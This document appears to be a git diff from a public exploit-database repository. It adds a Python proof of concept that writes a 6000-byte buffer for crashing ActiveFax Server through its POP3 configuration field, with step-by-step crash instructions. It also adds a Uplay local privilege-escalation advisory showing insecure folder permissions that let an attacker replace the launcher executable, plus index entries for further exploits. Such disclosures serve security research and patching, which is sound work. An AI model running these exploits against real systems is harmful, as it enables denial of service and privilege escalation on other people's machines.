# 1.- Run python code : ActiveFax_Server.py
|
||||||
|
# 2.- Open EVIL.txt and copy content to clipboard
|
||||||
|
# 3.- Open ActiveFaxServer.exe
|
||||||
|
# 4.- Open the Pop3 Server Config
|
||||||
|
# 5.- Press New
|
||||||
|
# 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password'
|
||||||
|
# 7.- Press ok Twice
|
||||||
|
# 8.- And you will see a crash.
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
buffer = "\x41" * 6000
|
||||||
|
|
||||||
|
try:
|
||||||
|
f=open("Evil.txt","w")
|
||||||
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print "[+] File created!"
|
||||||
|
except:
|
||||||
|
print "File cannot be created"
|
43
exploits/windows/local/47493.txt
Normal file
43
exploits/windows/local/47493.txt
Normal file
|
@ -0,0 +1,43 @@
|
||||||
|
# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
|
||||||
|
# Date: 2019-08-07
|
||||||
|
# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
|
||||||
|
# Vendor Homepage: https://uplay.ubisoft.com/
|
||||||
|
# Version: 92.0.0.6280
|
||||||
|
# Tested on: Windows 10 x64
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission
|
||||||
|
# that allows all BUILTIN-USER has full permission. An attacker replace the
|
||||||
|
# vulnerability execute file with malicious file.
|
||||||
|
|
||||||
|
///////////////////////
|
||||||
|
Proof of Concept
|
||||||
|
///////////////////////
|
||||||
|
|
||||||
|
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
|
||||||
|
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
|
||||||
|
BUILTIN\Users:(OI)(CI)(IO)(F)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(F)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Users:(I)(RX)
|
||||||
|
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
07 Aug, 19 : Found Vulnerability
|
||||||
|
07 Aug, 19 : Vendor Notification
|
||||||
|
14 Aug, 19 : Vendor Response
|
||||||
|
18 Sep, 19 : Vendor Fixed
|
||||||
|
18 Sep, 19 : Vendor released new patched
|
|
@ -6577,6 +6577,8 @@ id,file,description,date,author,type,platform,port
|
||||||
47487,exploits/windows/dos/47487.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
|
47487,exploits/windows/dos/47487.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
|
||||||
47488,exploits/windows/dos/47488.txt,"Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
|
47488,exploits/windows/dos/47488.txt,"Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
|
||||||
47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
|
47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
|
||||||
|
47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
|
||||||
|
47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -10713,6 +10715,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
|
47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
|
||||||
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
|
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
|
||||||
47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
|
47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
|
||||||
|
47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -41822,3 +41825,6 @@ id,file,description,date,author,type,platform,port
|
||||||
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
|
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
|
||||||
47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
|
47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
|
||||||
47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,
|
47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,
|
||||||
|
47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php,
|
||||||
|
47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,
|
||||||
|
47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue